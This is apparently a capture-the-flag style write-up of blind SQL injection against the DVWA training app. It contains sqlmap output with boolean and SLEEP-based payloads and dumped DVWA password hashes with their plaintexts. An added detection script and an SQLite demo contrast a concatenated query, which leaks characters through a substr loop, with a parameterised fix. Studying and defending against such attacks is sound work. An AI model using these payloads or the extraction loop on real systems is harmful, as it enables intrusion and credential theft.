DVWA_SQL_Injection_Blind_medium

1. Identify the injection point

Check whether an injection point exists by appending and 1=1 to the parameter.

2. Guess the length of the database name

3. Guess the database name

Comparing against the ASCII table, the first character is d

The second character is v

The third character is w

The fourth character is a

The database name is dvwa

4. Guess the number of tables in the database

The database contains two tables

5. Guess the length of the first table's name

The first table name has length 9

6. Guess the first table's name

The first character is g

The second character is u

Guessing one character at a time gives the first table's name: guestbook

7. Guess the length of the second table's name

Guessing gives a table name length of 5

8. Guess the second table's name

The first character is u

The second character is s

Guessing each following character in turn gives the table name: users

9. Guess the number of columns in the users table

Guessing gives a column count of 8

10. Guess the column names of the users table

① First column name

The first character is u

The second character is s

The third character is e

The fourth character is r

The fifth character is _

The sixth character is i

The seventh character is d

There is no eighth character, so the first column name is user_id

② Second column name

The first character is f

The second character is i

The third character is r

The fourth character is s

The fifth character is t

The sixth character is _

The seventh character is n

The eighth character is a

The ninth character is m

The tenth character is e

There is no eleventh character, so the second column name is first_name

③ Third column

The first character is l

The second character is a

Repeating the steps above eventually yields all 8 column names:

user, avatar, failed_login, first_name, last_login, last_name, password, user_id

11. Use sqlmap to retrieve the values of the user and password columns

sqlmap identified the following injection point(s) with a total of 98 HTTP(s) requests:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

banner: '5.5.62-log'

database management system users [1]:

[*] 'dvwa'@'127.0.0.1'

 

available databases [3]:

[*] dvwa

[*] information_schema

[*] test

 

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users     |

+-----------+

 

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

Database: dvwa

Table: users

[8 columns]

+--------------+-------------+

| Column       | Type        |

+--------------+-------------+

| user         | varchar(15) |

| avatar       | varchar(70) |

| failed_login | int(3)      |

| first_name   | varchar(15) |

| last_login   | timestamp   |

| last_name    | varchar(15) |

| password     | varchar(32) |

| user_id      | int(6)      |

+--------------+-------------+

 

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

Database: dvwa

Table: users

[5 entries]

+---------+---------------------------------------------+

| user    | password                                    |

+---------+---------------------------------------------+

| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |

| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |

| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |

| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+---------+---------------------------------------------+
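The sqlmap run above needed 98 requests and left two recognisable payload shapes in each one: a same-number tautology (id=1 AND 3304=3304) and a SLEEP() time probe, and the manual walkthrough adds a third, the substr/ASCII comparison. The following detection script is an added example, not part of the original write-up or of DVWA or sqlmap. It scans a constructed application-log excerpt for those three shapes and flags sources that send many of them, since the request volume of blind extraction is a stronger signal than any single payload. The log format, the source addresses and the assumption that the `id` POST parameter is logged at all are all constructed for the example; a default web-server access log does not contain POST bodies, so this kind of detection needs application or WAF logging.

```python
import re
from collections import Counter, defaultdict

# Constructed application-log excerpt (not real DVWA or web-server output).
# It assumes the application or WAF records the POST parameter `id`; a default
# access log would not include request bodies. The payloads on lines 2-4 are
# the ones shown in the walkthrough and the sqlmap output; line 5 is the
# substr/ASCII probe the manual steps describe.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 POST /vulnerabilities/sqli_blind/ id=1
2024-05-01T10:00:02Z 10.0.0.5 POST /vulnerabilities/sqli_blind/ id=1 AND 1=1
2024-05-01T10:00:03Z 10.0.0.5 POST /vulnerabilities/sqli_blind/ id=1 AND 3304=3304
2024-05-01T10:00:04Z 10.0.0.5 POST /vulnerabilities/sqli_blind/ id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)
2024-05-01T10:00:05Z 10.0.0.5 POST /vulnerabilities/sqli_blind/ id=1 AND ascii(substr(database(),1,1))=100
2024-05-01T10:00:06Z 10.0.0.9 POST /vulnerabilities/sqli_blind/ id=2
"""

# One line = timestamp, source address, method, path, and the logged id value.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) id=(?P<id>.*)$"
)

# Signatures for the three probe styles visible in the walkthrough and sqlmap output.
SIGNATURES = [
    # same-number tautology such as "AND 1=1" or "AND 3304=3304"
    ("tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.IGNORECASE)),
    # time-based probes
    ("time_delay", re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(", re.IGNORECASE)),
    # character-by-character inference helpers
    ("inference_function",
     re.compile(r"\b(SUBSTR|SUBSTRING|MID|ASCII|ORD|LENGTH|DATABASE)\s*\(", re.IGNORECASE)),
]


def classify(param_value):
    """Return the names of all signatures matching one parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(param_value)]


def analyze(log_text):
    """Count matching signatures per source address; clean requests add nothing."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for tag in classify(m.group("id")):
            per_ip[m.group("ip")][tag] += 1
    return {ip: dict(counts) for ip, counts in per_ip.items()}


def suspected_sources(findings, threshold=3):
    """Sources whose total of suspicious requests reaches the threshold.
    Blind extraction needs one request per guessed character, so a burst of
    oracle-style payloads from one address is the behaviour to alert on."""
    return sorted(ip for ip, counts in findings.items()
                  if sum(counts.values()) >= threshold)


if __name__ == "__main__":
    findings = analyze(SAMPLE_LOG)
    for ip, counts in findings.items():
        print(ip, counts)
    print("suspected:", suspected_sources(findings))
```

The per-signature counters make the alert explainable (which probe styles were seen, how many times), and the threshold keeps a single stray 1=1 from paging anyone; tune it against the real request rate of the endpoint.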


Limit:

The LIMIT clause restricts how many rows a SELECT returns

Limit x,y

x: the starting offset, counting from 0

y: the number of rows to return

substr(str,pos,len)

str: the string to take the substring from

pos: the position to start at, counting from 1

len: the number of characters to take
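To show why the LIMIT and substr building blocks above turn a plain true/false page into a data leak, and why parameterised queries close it, here is an added example that is not part of the original write-up and not DVWA's code. It builds an in-memory SQLite stand-in for the users table (the two rows reuse values from the sqlmap output; the schema is reduced and constructed), puts the same lookup behind a vulnerable string-concatenation query and a hardened parameterised one, and runs the walkthrough's character-guessing comparison against both. SQLite's unicode() stands in for MySQL's ascii(); the function names are the example's own.

```python
import sqlite3

# Constructed stand-in for the DVWA 'users' table: two rows taken from the
# sqlmap output above, schema reduced to three columns for the example.
SEED_ROWS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
]


def make_db():
    """Build an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def row_exists_vulnerable(conn, user_id):
    """Flawed lookup: the request parameter is concatenated into the SQL text,
    so the caller controls the WHERE clause. It answers only True/False, which
    is exactly the one-bit oracle a blind injection needs."""
    sql = "SELECT user FROM users WHERE user_id = " + user_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def row_exists_hardened(conn, user_id):
    """Fixed lookup: the id is validated as an integer and bound as a
    parameter, so the caller cannot change the query's structure."""
    if not user_id.isdigit():
        return False
    row = conn.execute(
        "SELECT user FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchone()
    return row is not None


def leak_char(lookup, conn, pos):
    """Recover character `pos` (1-based, as in substr) of the first user name
    through the true/false oracle, using the LIMIT 0,1 / substr / character
    code comparison the walkthrough performs by hand. Returns None when the
    oracle never answers True, i.e. when the lookup is not injectable."""
    for code in range(32, 127):
        probe = (
            "1 AND (unicode(substr((SELECT user FROM users ORDER BY user_id "
            f"LIMIT 0,1), {pos}, 1)) = {code})"
        )
        if lookup(conn, probe):
            return chr(code)
    return None


def demo():
    """Run the same guess against the vulnerable and the hardened lookup."""
    conn = make_db()
    leaked = leak_char(row_exists_vulnerable, conn, 1)
    blocked = leak_char(row_exists_hardened, conn, 1)
    return leaked, blocked


if __name__ == "__main__":
    print(demo())  # ('a', None)
```

The vulnerable lookup gives up the first character of the first user name with at most 95 yes/no questions, one per candidate code, which is the cost model behind the 98 requests sqlmap needed; the hardened lookup rejects the probe before it reaches the database, so the same loop learns nothing.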